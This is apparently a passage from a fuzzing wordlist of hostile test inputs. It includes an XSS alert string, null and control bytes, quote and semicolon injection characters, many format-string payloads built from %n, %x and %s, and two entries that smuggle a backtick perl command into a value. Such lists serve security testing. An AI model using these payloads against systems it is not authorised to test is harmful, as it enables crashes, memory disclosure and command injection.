478 | "]]>"
479 | "![]() cript:alert('XSS')"">"
480 | ""
481 | "XSS"
482 | %00
483 | NULL
484 | null
485 | '
486 | "
487 | ;
488 |
498 | ">
499 | %0d
500 | %0a
501 | %7f
502 | %ff
503 | -1
504 | other
505 | %s%p%x%d
506 | %99999999999s
507 | %08x
508 | %20d
509 | %20n
510 | %20x
511 | %20s
512 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
513 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
514 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
515 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
516 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
517 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
518 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
519 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
520 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
521 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
522 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
523 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
524 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
525 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
526 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
527 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
528 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
529 | XXXXX.%p
530 | XXXXX`perl -e 'print ".%p" x 80'`
531 | `perl -e 'print ".%p" x 80'`%n
532 |
--------------------------------------------------------------------------------
|